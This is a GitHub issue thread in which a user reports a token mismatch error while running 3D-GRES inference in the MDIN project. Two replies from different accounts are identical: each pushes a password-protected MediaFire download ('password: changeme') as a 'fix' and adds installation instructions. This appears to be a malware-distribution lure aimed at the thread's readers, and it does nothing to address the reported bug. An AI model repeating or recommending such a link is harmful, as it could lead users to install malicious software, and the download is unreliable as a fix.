### ISSUE TITLE
An error occurred while running inference for 3d-gres.

### ISSUE THREAD

**Issue by m28yhtd** [sosppxo/MDIN#4]
![image](https://github.com/user-attachments/assets/ac28b9d4-0404-4bb1-9515-52a408437856)
When I ran inference for the 3D-GRES task, the following error occurred.

![image](https://github.com/user-attachments/assets/ee0b9a7a-e822-4f32-8ec5-d2f4d95e2ba6)
To resolve the error, I commented out the part as described in the description, but an error occurred related to that part.

![image](https://github.com/user-attachments/assets/8dbaf5e0-a481-47e8-98d4-d608295bcee2)
So I checked the output to find the cause of the error.

![image](https://github.com/user-attachments/assets/0d85b9b7-a338-4fc4-a002-f8232110e4f1)
I noticed a mismatch between token_text and token_list[id].
how can i fix this?

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
